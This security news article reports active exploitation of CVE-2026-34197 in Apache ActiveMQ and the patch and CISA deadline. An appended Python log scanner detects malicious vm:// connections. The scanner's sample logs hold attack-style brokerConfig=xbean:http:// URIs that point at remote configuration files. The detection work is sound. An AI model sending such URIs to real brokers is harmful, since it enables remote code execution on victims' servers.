
Actively exploited Apache ActiveMQ flaw impacts 6,400 servers

Why This Matters

The discovery of a high-severity, actively exploited vulnerability in Apache ActiveMQ highlights the ongoing risks posed by unpatched open-source software in enterprise environments. This flaw, which allows remote code execution, underscores the importance of timely patching and vigilant monitoring to prevent cyberattacks that can compromise critical communication infrastructure.

Key Takeaways

Nonprofit security organization Shadowserver found that over 6,400 Apache ActiveMQ servers exposed online are vulnerable to ongoing attacks exploiting a high-severity code injection vulnerability.

Apache ActiveMQ is the most popular open-source multi-protocol message broker for asynchronous communication between Java applications.

Tracked as CVE-2026-34197, the vulnerability had gone undetected for 13 years before Horizon3 researcher Naveen Sunkavally discovered it with the help of the Claude AI assistant.

As Sunkavally explained, this security flaw stems from an improper input validation weakness that enables authenticated threat actors to execute arbitrary code on unpatched systems. The Apache maintainers patched the vulnerability on March 30 in ActiveMQ Classic versions 6.2.3 and 5.19.4.

As threat monitoring service Shadowserver warned on Monday, more than 6,400 IP addresses with Apache ActiveMQ fingerprints exposed online are also vulnerable to CVE-2026-34197 attacks, with most in Asia (2,925), North America (1,409), and Europe (1,334).

Unpatched ActiveMQ servers exposed online (Shadowserver)

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) also warned on Thursday that this Apache ActiveMQ vulnerability is now actively exploited in attacks and ordered Federal Civilian Executive Branch (FCEB) agencies to secure their servers by April 30.

"This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise," the cybersecurity agency warned.

"Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable."

Horizon3 researchers advised admins to search the ActiveMQ broker logs for signs of exploitation by looking for suspicious broker connections that use the internal transport protocol VM and the brokerConfig=xbean:http:// query parameter.
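As an added example (not code from the article or from Horizon3), the Python below sifts broker log text for the two indicators named above: a vm:// transport connection whose brokerConfig parameter loads an xbean configuration over HTTP. The log line layout and the sample entries are constructed, percent-encoded query strings are decoded before matching, and an https:// xbean URL is accepted as a generalisation of the http:// form cited.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines; the layout is assumed, not copied from a real broker log.
SAMPLE_LOG = """\
2026-04-06 10:01:12,331 | INFO  | Connector openwire started | TransportConnector
2026-04-06 10:02:45,120 | INFO  | Establishing network connection from vm://localhost?brokerConfig=xbean:http://198.51.100.23:8000/remote.xml to tcp://10.0.0.5:61616 | DemandForwardingBridge
2026-04-06 10:03:01,004 | INFO  | Establishing network connection from vm://localhost?create=false to tcp://10.0.0.6:61616 | DemandForwardingBridge
2026-04-06 10:04:17,900 | INFO  | Establishing network connection from vm://localhost?brokerConfig=xbean%3Ahttp%3A%2F%2F203.0.113.7%2Fconf.xml to tcp://10.0.0.7:61616 | DemandForwardingBridge
2026-04-06 10:05:09,512 | WARN  | Transport Connection to: tcp://10.0.0.9:52311 failed | Transport
"""

# A vm:// URI runs until whitespace or a quote character.
VM_URI_RE = re.compile(r"vm://[^\s\"']+")
# Indicator from the Horizon3 guidance: brokerConfig pointing at an xbean file fetched
# over HTTP. https:// is included as a generalisation of the http:// form in the article.
XBEAN_REMOTE_RE = re.compile(r"brokerConfig=xbean:(https?://[^&\s\"']+)", re.IGNORECASE)


def find_suspicious_connections(log_text):
    """Return (line_number, vm_uri, remote_config_url) for every vm:// connection
    whose brokerConfig loads an xbean configuration from a remote HTTP(S) URL."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        for match in VM_URI_RE.finditer(line):
            # Decode percent-encoding first so an encoded query string is not missed.
            vm_uri = unquote(match.group(0))
            remote = XBEAN_REMOTE_RE.search(vm_uri)
            if remote:
                hits.append((lineno, vm_uri, remote.group(1)))
    return hits


if __name__ == "__main__":
    for lineno, vm_uri, url in find_suspicious_connections(SAMPLE_LOG):
        print(f"line {lineno}: remote broker config {url} via {vm_uri}")
```

Each hit names the remote URL the broker was asked to fetch its configuration from, which is the value to pivot on when triaging outbound connections from the host.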
